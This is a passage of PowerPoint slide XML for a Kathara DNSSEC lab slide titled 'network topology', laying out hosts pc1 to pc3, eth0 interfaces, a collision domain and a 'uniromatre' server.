              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{144EDECC-4B50-96B4-7C79-AEDF01F8486A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3799212" y="3881170"/>
            <a:ext cx="1286124" cy="6713"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="5F5F5F"/>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endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="55" name="Connettore diritto 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1577400-5973-C9D5-C90C-84FBAB7E58C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5217619" y="5309001"/>
            <a:ext cx="7414" cy="615427"/>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50" name="Line 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5EDF864-EE79-D790-7FDB-8D8652E8A606}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="7403649" y="1891613"/>
            <a:ext cx="20032" cy="460633"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="5F5F5F"/>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endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="39" name="Connettore diritto 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98FFB23E-3CE0-FD94-E77C-C9BFBAE57D8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="32" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5691343" y="1822409"/>
            <a:ext cx="5866" cy="635826"/>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Connettore diritto 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F342D0C8-E424-AD96-34FB-A1D967B74D18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="7" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4763186" y="1841489"/>
            <a:ext cx="0" cy="60239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Connettore diritto 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6080A8BB-C4B0-5E7C-AF36-F66B7BD267C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="4" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3821141" y="1834146"/>
            <a:ext cx="0" cy="599215"/>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9220" name="Rectangle 145">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38B7AB9C-443C-190B-DD17-17EADD1D849B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>network topology</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDC2181D-E77A-6F61-129F-39087F123178}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8905197-5254-49E9-E2B1-6242702FE0D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 104">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF548390-1AC9-2A2D-0A4B-534999FD223D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3532746" y="1220690"/>
            <a:ext cx="576790" cy="613456"/>
            <a:chOff x="1429" y="1064"/>
            <a:chExt cx="818" cy="870"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3" name="Picture 105">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1A36392-D62D-FC3B-DFDF-D8D2E705D468}"/>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52" y="1064"/>
              <a:ext cx="573"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 Box 106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D429EB6E-E631-7976-7F9E-B54061AC0952}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1429" y="1582"/>
              <a:ext cx="818" cy="352"/>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50000"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
                <a:t>pc1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 104">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D80D959-0B0A-DBC9-B176-5E80A03D1B9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4474791" y="1228033"/>
            <a:ext cx="576790" cy="613456"/>
            <a:chOff x="1429" y="1064"/>
            <a:chExt cx="818" cy="870"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 105">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3247083B-67A8-AAE7-09C6-7AB1793BF030}"/>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52" y="1064"/>
              <a:ext cx="573"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 Box 106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50CC8B81-2464-2AA3-C6FB-958F5BB68E80}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1429" y="1582"/>
              <a:ext cx="818" cy="352"/>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50000"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
                <a:t>pc2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 104">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7F5AE82-0D07-D12C-1233-42AC1C15F289}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1518965" y="5559356"/>
            <a:ext cx="576790" cy="613456"/>
            <a:chOff x="1429" y="1064"/>
            <a:chExt cx="818" cy="870"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Picture 105">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97D1C2A8-B36E-55F4-0875-65B78A11FF8B}"/>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52" y="1064"/>
              <a:ext cx="573"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Text Box 106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82897B7E-F5B7-6C4E-2A55-DE39BE0EEDBC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1429" y="1582"/>
              <a:ext cx="818" cy="352"/>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50000"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
                <a:t>pc3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Line 151">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{693D7DB7-7AAD-A380-BB32-994D0A092775}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3440447" y="2446573"/>
            <a:ext cx="3852857" cy="23324"/>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endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Oval 152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69428313-DB53-631F-3766-E7F6F8221F7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7293304" y="2363536"/>
            <a:ext cx="220690" cy="220690"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>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it-IT" altLang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07F88F38-E909-BB29-30E1-A344B51D5745}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3657018" y="1972871"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B33F32CD-7090-49DE-3D84-56BA01713BED}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9575810-390E-C529-A125-7EEF5166E348}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E4A5967-0971-63AC-7508-468D5F421D3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4597668" y="1958829"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0084805D-6035-46BD-2115-06190225E399}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36937973-FCBC-7415-72C1-66383404F237}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31" name="Gruppo 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BE2FFCA-3208-A78E-3C45-029706448423}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5243610" y="1227608"/>
            <a:ext cx="907197" cy="594801"/>
            <a:chOff x="10432210" y="4306849"/>
            <a:chExt cx="907197" cy="594801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Text Box 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFAAC1E6-3702-3D96-050E-EB33987FB555}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10432210" y="4653248"/>
              <a:ext cx="907197" cy="248402"/>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50000"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0" err="1"/>
                <a:t>uniromatre</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="AutoShape 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A57E06DE-34A5-11C0-BF58-4DF4AEE274FF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10691757" y="4306849"/>
              <a:ext cx="378624" cy="350441"/>
            </a:xfrm>
            <a:prstGeom prst="cube">
              <a:avLst>
                <a:gd name="adj" fmla="val 15116"/>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endParaRPr lang="it-IT" altLang="it-IT" sz="1800">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="mainfrm">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{268AE795-B7FE-8CEE-CAA4-FD3DAB829ED1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10691757" y="4360763"/>
              <a:ext cx="324710" cy="296527"/>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 name="T24" fmla="*/ 326 w 21600"/>
                <a:gd name="T25" fmla="*/ 22180 h 21600"/>
                <a:gd name="T26" fmla="*/ 21559 w 21600"/>
                <a:gd name="T27" fmla="*/ 27893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extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="21600" y="10885"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10634" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10800" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="10885"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="21600" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1163" y="19729"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16449" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="19729"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1495" y="2381"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2160" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="7483"/>
                  </a:lnTo>
